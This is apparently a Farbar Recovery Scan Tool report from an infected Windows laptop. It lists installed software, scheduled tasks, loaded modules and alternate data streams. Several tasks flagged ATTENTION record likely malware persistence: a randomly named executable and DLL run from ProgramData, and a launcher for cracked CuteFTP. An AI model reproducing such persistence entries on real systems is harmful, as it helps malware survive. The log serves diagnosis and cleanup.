Motorola Mobile Drivers Installation 6.4.0 (HKLM\...\{27986EDD-C9EC-4B52-B92F-06D073F0AA52}) (Version: 6.4.0 - Motorola Mobility LLC)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
Nitro Pro 8 (HKLM\...\{2269F0D5-DE47-4313-9003-BB6357919314}) (Version: 8.5.5.7 - Nitro)
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4903.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4903.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4903.1002 - Microsoft Corporation) Hidden
QuickTime Alternative 1.81 (HKLM-x32\...\QuicktimeAlt_is1) (Version: 1.81 - )
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.30164 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7040 - Realtek Semiconductor Corp.)
ReminderInstaller (HKLM-x32\...\InstallShield_{48B99BC9-CEB0-485E-96B1-4609BC86D2DE}) (Version: 1.00.0000 - Absolute Software.)
ReminderInstaller (x32 Version: 1.00.0000 - Absolute Software.) Hidden
Revo Uninstaller Pro 3.1.4 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.4 - VS Revo Group, Ltd.)
SofTest v11 (HKLM-x32\...\InstallShield_{BEFAE631-635D-41B7-996E-33F134DE951D}) (Version: 11.31.1 - Examsoft)
SofTest v11 (x32 Version: 11.31.1 - Examsoft) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.9.5 - Synaptics Incorporated)
TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - )
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.56083 - TeamViewer)
UserGuide (HKLM-x32\...\InstallShield_{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 1.0.0.15 - Lenovo)
UserGuide (x32 Version: 1.0.0.15 - Lenovo) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VPN Unlimited version 3.1.5 (HKLM-x32\...\{DC24521E-872B-41AF-93EA-FE477902D6FB}_is1) (Version: 3.1.5 - KeepSolid Inc.)
VUDU To Go (HKLM-x32\...\com.vudu.air.Downloader) (Version: 2.3.1 - Vudu)
VUDU To Go (x32 Version: 2.3.1 - Vudu) Hidden
Windows Driver Package - Lenovo (ACPIVPC) System (02/17/2013 9.52.0.776) (HKLM\...\35DD26BE48DAF4A9F35F969F3CB1E3E1435E661E) (Version: 02/17/2013 9.52.0.776 - Lenovo)
Windows Driver Package - Lenovo (WUDFRd) LenovoVhid (07/25/2013 10.30.0.288) (HKLM\...\6BCA401E9CBEED970D75F55FA5320F60D11984E9) (Version: 07/25/2013 10.30.0.288 - Lenovo)
WinRAR 5.30 beta 5 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.30.5 - win.rar GmbH)
XnConvert 1.73 (HKLM-x32\...\XnConvert_is1) (Version: 1.73 - Gougelet Pierre-e)
Yoga Picks (HKLM-x32\...\{267C8BA0-876B-4589-9F14-EFB84ABCEA7F}) (Version: 1.00.013.0731 - Lenovo)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3283718265-1983809055-1317204610-1001_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\007\AppData\Local\Microsoft\OneDrive\17.3.6798.0207\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-3283718265-1983809055-1317204610-1001_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AC}\InprocServer32 -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp_x64.dll (Intel)
CustomCLSID: HKU\S-1-5-21-3283718265-1983809055-1317204610-1001_Classes\CLSID\{9E506282-69D3-5ABA-9C1D-15994B37F4AD}\InprocServer32 -> C:\Program Files (x86)\Lenovo\LenovoAppShop\bin\npAppUp_x64.dll (Intel)

==================== Restore Points =========================


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 07:25 - 2013-08-22 07:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {03896D04-23AB-4F74-A27D-B1B71EE41E2C} - System32\Tasks\Microsoft\Windows\EnterpriseMgmt\MDMMaintenenceTask => C:\Windows\system32\MDMAgent.exe [2016-07-16] (Microsoft Corporation)
Task: {03FC901B-03A8-46EB-801A-6B41B55D19B8} - \Microsoft\Windows\Setup\GWXTriggers\OnIdle-5d -> No File <==== ATTENTION
Task: {0532AB2A-3568-4A59-9C82-2B644C49851D} - System32\Tasks\Microsoft\Windows\ErrorDetails\ErrorDetailsUpdate
Task: {09D247E6-38E4-4228-BB1B-6BE1E48FC850} - System32\Tasks\Motorola Device Manager Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2014-10-30] ()
Task: {11EF8237-224D-4CF9-9039-61D08754EA5D} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => C:\Windows\system32\compattelrunner.exe [2016-10-14] (Microsoft Corporation)
Task: {132934A7-AF74-4FBF-8B3E-69282D4B6053} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2015-06-03] (Synaptics Incorporated)
Task: {16DEA092-FB0C-40D0-AE20-0536BECC21D9} - System32\Tasks\Microsoft\Windows\EDP\EDP App Launch Task
Task: {184784E2-6ACB-4154-BD0F-A955BE13F177} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePolicyChange
Task: {1AD363AC-A1A5-4239-86F6-60C9AC4B4F31} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2016-11-01] (Microsoft Corporation)
Task: {1B65DD58-D16B-45E8-BEB4-94D7E4D64DF7} - System32\Tasks\Microsoft\Windows\EDP\EDP Auth Task
Task: {20F8AF67-5750-4720-B0AC-8D14ACF2A51E} - System32\Tasks\Microsoft\XblGameSave\XblGameSaveTaskLogon => C:\Windows\System32\XblGameSaveTask.exe [2016-07-16] (Microsoft Corporation)
Task: {287685D1-1882-4B11-8A3F-7DA00FFC31C2} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\Windows\System32\AutoWorkplace.exe
Task: {35C15BFF-0053-4E3F-9D8F-12A1B3315818} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2017-01-17] (Microsoft Corporation)
Task: {365DF4D4-9F2A-4BB6-B466-7B245416627A} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-12-19] (Adobe Systems Incorporated)
Task: {36DF9173-D619-4613-85F9-64D7768DA80D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {43DF67E8-D733-48FA-98F2-4E6D341E4A79} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => C:\Windows\system32\compattelrunner.exe [2016-10-14] (Microsoft Corporation)
Task: {44707F62-A094-44E9-AF19-40CD1E6A8FA5} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2017-01-17] (Microsoft Corporation)
Task: {460930EB-5F58-4CAF-8E29-F0D47ED74F1C} - \{0D080447-7F09-0979-0F11-050B0F0D110D} -> No File <==== ATTENTION
Task: {51B7FB15-4DCB-400E-9A98-10E802F21FB3} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceScreenOnOff
Task: {5654DFBB-E797-4758-B9A0-8BAE94A91F1D} - System32\Tasks\Microsoft\Windows\DUSM\dusmtask => C:\Windows\System32\dusmtask.exe [2016-07-16] (Microsoft Corporation)
Task: {5B1BFB8A-7401-4997-9C41-F6CE9BD3A096} - System32\Tasks\Microsoft\Windows\ErrorDetails\EnableErrorDetailsUpdate
Task: {5FAAF530-ED1B-4F7B-AD7B-1694AA0B202B} - System32\Tasks\Microsoft\Windows\CertificateServicesClient\CryptoPolicyTask
Task: {6232090F-3BD0-4E1F-960B-78CBA797F685} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\HandleWnsCommand
Task: {668FBCA0-F2D3-48CC-8B65-72CF17BC93FE} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\windows\system32\MRT.exe [2017-02-23] (Microsoft Corporation)
Task: {675C1F35-C487-4F46-8C84-0A5E9589D3C2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-07] (Google Inc.)
Task: {67DB9C2C-778D-4C59-9507-E882F7A00413} - System32\Tasks\Microsoft\Windows\Management\Provisioning\Logon => C:\Windows\system32\ProvTool.exe [2016-09-24] (Microsoft Corporation)
Task: {6B1AE720-1359-4B9E-9C0F-60167361EF01} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyRefreshTask
Task: {6D1C0035-5CAD-4340-A533-D63C9853BCC9} - System32\Tasks\Microsoft\Windows\Storage Tiers Management\Storage Tiers Management Initialization
Task: {6E8AE752-C5D2-4B34-B351-338B4370A342} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\HandleCommand
Task: {6EB74394-17E6-4CD1-922E-7ABCAA8840E5} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\007\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {769A9BD4-DD4F-4EC7-AB96-408AF78E5A35} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2 => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\Bootstrap.exe [2013-07-03] (Intel Corporation)
Task: {7AC5E1E2-2FD3-40CD-8842-88CE53A3609C} - System32\Tasks\Microsoft\Windows\DiskFootprint\StorageSense
Task: {7D45AAE3-C208-40FF-B374-A9B31F11F7A3} - System32\Tasks\{8A254196-3D8E-F63D-E565-AD7C49709C85} => C:\ProgramData\{5072ACE0-E7D9-1B4B-3712-1D14D15C2594}\D66BD8CC-61C0-6F67-DF41-48BB72D20D63.exe <==== ATTENTION
Task: {7D64B009-CEAB-4E68-B328-7CD0AC72B421} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office 15\root\Office15\msoia.exe [2016-11-01] (Microsoft Corporation)
Task: {80416385-3D28-4A19-941E-3A6AF6251733} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: {82EBF27F-B848-4FC6-A93C-0E2F5DEF2F73} - System32\Tasks\ISM-UpdateService-e57b59e7-5862-4250-9ce0-76fb411dc0d2-Logon => C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\Bootstrap.exe [2013-07-03] (Intel Corporation)
Task: {84074B47-185C-4F11-9725-63EEC24862DA} - System32\Tasks\Microsoft\Windows\License Manager\TempSignedLicenseExchange
Task: {8519140C-2AEF-4987-B1B6-075F6AAB760A} - \McAfee Remediation (Prepare) -> No File <==== ATTENTION
Task: {85F00F57-CCEF-43D1-AA53-8FB9FFCD43BF} - System32\Tasks\{26246267-DEF5-4009-831D-1F5587DB66B2} => pcalua.exe -a "C:\Users\007\Downloads\188.165.245.171 Downloads\CuteFTP.Pro.v8.3.4.Cracked-REVENGE\cuteftppro.exe" -d "C:\Users\007\Downloads\188.165.245.171 Downloads\CuteFTP.Pro.v8.3.4.Cracked-REVENGE"
Task: {8992DB38-9182-4B89-A615-A01B3F8C9F8F} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {8D791FAA-0257-4EBC-A6DD-74E842528806} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceSettingChange
Task: {9851188E-AC07-4F36-BA28-6D00BB2C9C46} - System32\Tasks\Microsoft\Windows\Device Information\Device => C:\Windows\system32\devicecensus.exe [2016-10-14] (Microsoft Corporation)
Task: {A1A1610B-2B55-4C5E-BC46-458BF76BA02A} - System32\Tasks\Microsoft\XblGameSave\XblGameSaveTask => C:\Windows\System32\XblGameSaveTask.exe [2016-07-16] (Microsoft Corporation)
Task: {A4497E84-87C6-4477-BDFD-E958CED4C0BE} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {A56FD01F-A5C7-4E0F-8A87-94E430DB47D0} - System32\Tasks\{1C4B8B9E-DE5F-6DE8-65E2-49D96144215A} => C:\PROGRA~3\ea2cb491\ddb08c37.dll/s /n /I:"/rt" "C:\PROGRA~3\ea2cb491\ddb08c37.dll"
Task: {A7F3919A-4125-4892-A812-236A5557F5E7} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-12-21] (Piriform Ltd)
Task: {AA1E3E10-D4BA-4681-8F7C-779A395428D0} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {B320E058-C6FA-413F-876B-0C9B4428AE66} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic6
Task: {B6EE76B2-4F82-4E15-9345-C867A29CBAD0} - System32\Tasks\Microsoft\Windows\Speech\SpeechModelDownloadTask => C:\Windows\system32\speech_onecore\common\SpeechModelDownload.exe [2016-09-24] (Microsoft Corporation)
Task: {B8C83F4E-09CF-4B80-84F1-BCA8AC50B112} - System32\Tasks\OneDrive Standalone Update Task v2 => %localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
Task: {BDDEF317-2692-422F-AEA2-FFD67DC7CEA3} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterUserDevice
Task: {C125018F-0B81-4B64-B7DC-0E01220E5D0E} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceAccountChange
Task: {C34D8C79-A216-4091-9D42-EC02CF67B018} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {C55F594B-885F-4350-A465-7D88160B3801} - \Microsoft\Windows\Setup\GWXTriggers\Time-Weekend -> No File <==== ATTENTION
Task: {C6B2579B-4962-4D12-883D-BBD420573A6C} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic1
Task: {CAFE5B51-DC10-4097-8DB7-704EE8566FA5} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {CC1FFF22-A79B-469F-9BBD-E135EF0BE706} - \Adobe Flash Player PPAPI Notifier -> No File <==== ATTENTION
Task: {CC636E49-0109-402B-A40B-A37C29069A95} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\LocateCommandUserSession
Task: {D19A2726-897E-4F7D-9CE4-0773B449CE9E} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceConnectedToNetwork
Task: {D394BE25-2E16-45D4-AAB2-3E8861A09351} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyMonitorToastTask
Task: {D3C4106A-D511-42C6-9716-465644534C87} - System32\Tasks\microsoft\windows\applicationdata\appuriverifierinstall => C:\Windows\system32\AppHostRegistrationVerifier.exe [2016-07-16] (Microsoft Corporation)
Task: {D941F53F-7907-4FBE-B1E7-69EBD5B3A5D8} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDeviceLocationRightsChange
Task: {DA856DF9-93EE-4AB2-87C2-867385F2262A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-07] (Google Inc.)
Task: {DD1F0805-7E74-403A-85DE-5C0E31E01169} - System32\Tasks\Microsoft\Windows\SpacePort\SpaceManagerTask => C:\Windows\system32\spaceman.exe [2016-09-15] (Microsoft Corporation)
Task: {DDAECFC0-67E3-4062-BF25-CD685F73B394} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\IntegrityCheck
Task: {DE4F9764-9E73-4F9F-8F24-A6CA1FEE3248} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {E1935286-5CEB-4530-9F4D-F6427CD704B9} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {E1949760-83C6-436C-AAC4-3082F5B107C3} - System32\Tasks\Motorola Device Manager Initial Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2014-10-30] ()
Task: {E6C59EFE-9151-4D35-BEA9-93E8415BF71B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {E7B04252-97CA-42C6-9920-F58B76B2C3E1} - System32\Tasks\Microsoft\Windows\DeviceDirectoryClient\RegisterDevicePeriodic24
Task: {E9BC11D6-9D78-4595-B779-862926E669D9} - System32\Tasks\Lenovo Smart Voice => C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvTrayLoad.exe [2013-10-26] (Lenovo)
Task: {EA9BAA00-6604-4A27-8A73-AFA65F0EE1B3} - System32\Tasks\Microsoft\Windows\SharedPC\Account Cleanup => Rundll32.exe %windir%\System32\Windows.SharedPC.AccountManager.dll,StartMaintenance
Task: {ECEDC57D-8965-4EB1-BD6F-84791D928E23} - System32\Tasks\microsoft\windows\applicationdata\appuriverifierdaily => C:\Windows\system32\AppHostRegistrationVerifier.exe [2016-07-16] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Loaded Modules (Whitelisted) ==============

2016-07-16 05:42 - 2016-07-16 05:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-12-14 08:03 - 2016-12-09 04:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-11-08 01:15 - 2017-01-17 03:25 - 00117440 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-10-05 18:17 - 2016-10-05 18:17 - 01353528 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2013-10-26 19:01 - 2012-04-24 04:43 - 00390632 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
2013-10-26 19:01 - 2013-10-26 19:01 - 00061200 _____ () C:\ProgramData\LenovoTransition\Server\x64\dptf.dll
2016-12-14 08:03 - 2016-12-09 04:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-07-29 23:04 - 2016-05-24 10:43 - 08909504 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2015-10-16 04:02 - 2015-10-16 04:02 - 00043480 _____ () C:\Program Files\FileZilla FTP Client\fzshellext_64.dll
2016-09-24 00:58 - 2016-09-24 00:58 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2017-01-10 22:44 - 2016-12-21 01:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-01-19 12:24 - 2017-01-19 12:25 - 01969360 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.7.0_x64__8wekyb3d8bbwe\Microsoft.Applications.Telemetry.Windows.dll
2017-01-19 12:24 - 2017-01-19 12:25 - 00381440 _____ () C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_1.4.7.0_x64__8wekyb3d8bbwe\Microsoft.Notes.Upgrade.dll
2017-01-10 22:44 - 2016-12-21 00:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-01-10 22:44 - 2016-12-21 00:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-01-10 22:44 - 2016-12-21 00:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-01-10 22:44 - 2016-12-21 00:47 - 00114176 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Dss.BackgroundTask.dll
2013-10-26 19:01 - 2013-10-26 19:01 - 00294672 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\Transition.exe
2013-10-26 19:01 - 2013-10-26 19:01 - 00108304 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\TransitionServer.exe
2017-02-02 19:58 - 2017-02-01 03:47 - 02459992 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libglesv2.dll
2017-02-02 19:58 - 2017-02-01 03:47 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libegl.dll
2017-03-01 18:15 - 2017-03-01 18:15 - 01070080 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.452.0_x64__8wekyb3d8bbwe\TimeBackground.dll
2017-01-10 22:44 - 2016-12-21 00:47 - 00115712 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\DeviceSideServicesActionUriHandler.dll
2017-01-10 22:44 - 2016-12-21 00:47 - 00522752 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.NodeWinrtWrap.dll
2016-07-16 05:43 - 2016-07-16 08:27 - 00040448 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\winrt-projections\bin\Winrt_Projections.node
2016-07-16 05:43 - 2016-07-16 08:26 - 00813056 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http\bin\NodeRT_Windows_Web_Http.node
2016-07-16 05:43 - 2016-07-16 08:27 - 00963584 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http.headers\bin\NodeRT_Windows_Web_Http_Headers.node
2016-07-16 05:43 - 2016-07-16 08:27 - 00249344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.web.http.filters\bin\NodeRT_Windows_Web_Http_Filters.node
2016-07-16 05:43 - 2016-07-16 08:27 - 00572416 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.storage.streams\bin\NodeRT_Windows_Storage_Streams.node
2016-07-16 05:43 - 2016-07-16 08:27 - 00403968 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.foundation\bin\NodeRT_Windows_Foundation.node
2016-07-16 05:43 - 2016-07-16 08:27 - 00183296 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\nodert-buffer-utils\bin\NodeRT_Buffer_Utils.node
2016-07-16 05:43 - 2016-07-16 08:26 - 00288256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\dss_service\node_modules\windows.cortana.pal\bin\NodeRT_Windows_Cortana_PAL.node
2017-02-22 22:08 - 2017-02-22 22:08 - 00073728 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.110.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-02-22 22:08 - 2017-02-22 22:08 - 00179712 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.110.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-02-22 22:08 - 2017-02-22 22:08 - 42895360 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.110.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-02-06 16:02 - 2017-02-06 16:02 - 02215424 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.11.110.0_x64__kzf8qxf38zg5c\roottools.dll
2017-01-23 07:36 - 2017-01-23 07:36 - 00055808 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsStore_11610.1001.25.0_x64__8wekyb3d8bbwe\WinStoreTasksWrapper.dll
2014-04-07 08:31 - 2014-04-07 08:31 - 00172032 _____ () C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\css_core.dll
2016-04-25 11:39 - 2016-04-25 11:39 - 00904704 _____ () C:\Program Files (x86)\Examsoft\Softest 11.0\System.Data.SQLite.dll
2013-10-26 19:01 - 2013-10-26 19:01 - 00102672 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\Config\1366\TransitionLib.dll
2013-10-26 19:01 - 2013-10-26 19:01 - 00101648 _____ () C:\Program Files (x86)\Lenovo\Lenovo Transition\LUpdatePackage.dll
2013-10-26 19:01 - 2013-10-26 19:01 - 00101648 _____ () C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LUpdatePackage.dll
2013-10-26 18:44 - 2013-08-08 14:25 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
 
==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\BlackChipPoker:Win32App_1
AlternateDataStreams: C:\Program Files\Bonjour:Win32App_1
AlternateDataStreams: C:\Program Files\CCleaner:Win32App_1
AlternateDataStreams: C:\Program Files\Dolby Digital Plus:Win32App_1
AlternateDataStreams: C:\Program Files\FileZilla FTP Client:Win32App_1
AlternateDataStreams: C:\Program Files\Intel:Win32App_1
AlternateDataStreams: C:\Program Files\iTunes:Win32App_1
AlternateDataStreams: C:\Program Files\Microsoft Office 15:Win32App_1
AlternateDataStreams: C:\Program Files\Microsoft Silverlight:Win32App_1
AlternateDataStreams: C:\Program Files\WinRAR:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Apple Software Update:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\BlueStacks:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Bonjour:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\DVD Shrink:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\LastPass:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Magical Jelly Bean:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Malwarebytes Anti-Malware:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Microsoft Silverlight:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\mIRC:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\Mozilla Firefox:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\MSXML 4.0:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\QuickTime Alternative:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\TeamViewer:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\VPN Unlimited:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\VUDUToGo:Win32App_1
AlternateDataStreams: C:\Program Files (x86)\XnConvert:Win32App_1
AlternateDataStreams: C:\WINDOWS\SysWOW64:Win32App_1
AlternateDataStreams: C:\ProgramData\BlueStacks:Win32App_1
AlternateDataStreams: C:\ProgramData\Intel(R) Update Manager:Win32App_1
AlternateDataStreams: C:\ProgramData\regid.1991-06.com.microsoft:Win32App_1

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iai2c.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SpbCx.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\uefi.sys => ""="Driver"
